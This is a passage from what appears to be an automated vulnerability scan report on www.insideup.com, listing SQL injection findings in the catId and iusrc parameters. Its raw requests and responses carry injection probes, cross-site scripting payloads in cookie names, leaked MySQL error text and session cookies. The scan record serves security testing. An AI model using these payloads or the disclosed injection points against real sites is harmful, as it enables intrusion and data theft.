Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:54:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/leadflow/dima00/project.php was not found on this server.</p>

1.243. http://www.insideup.com/ppc/leadflow/dima00/leadflow/dima00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/leadflow/dima00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/leadflow/dima00/project.php?catId=1;WAITFOR' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:56:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qsilqc643t9jp7hs47fiuvn9v5; path=/
Content-Length: 2286
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
d = prj.groupId    
    where prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?catId=1;WAITFOR'' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?catId=1;WAITFOR'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/dima00/leadflow/dima00/project.php?catId=1;WAITFOR'/'
   union select prj' at line 5

Request 2

GET /ppc/leadflow/dima00/leadflow/dima00/project.php?catId=1;WAITFOR'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:56:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=djlqaqk0djhae1663u3t0gv2m6; path=/
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/leadflow/dima00/project.php was not found on this server.</p>

1.244. http://www.insideup.com/ppc/leadflow/dima00/leadflow/dima00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/leadflow/dima00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/leadflow/dima00/project.php?catId=80006&iusrc=' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0011A7)%3C/script%3E
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:06:47 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=sq0oagedr94l7fpc1ijn6rjet3; path=/
Content-Length: 2310
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
j.groupId    
    where prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?catId=80006&iusrc='' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?catId=80006&iusrc='/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/dima00/leadflow/dima00/project.php?catId=80006&iusrc='/'
   union select ' at line 5

Request 2

GET /ppc/leadflow/dima00/leadflow/dima00/project.php?catId=80006&iusrc='' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0011A7)%3C/script%3E
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 07:07:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=sp1n81495ui5q2ekn2tj635rr2; path=/
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/leadflow/dima00/project.php was not found on this server.</p>

1.245. http://www.insideup.com/ppc/leadflow/dima00/leadflow/dima00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
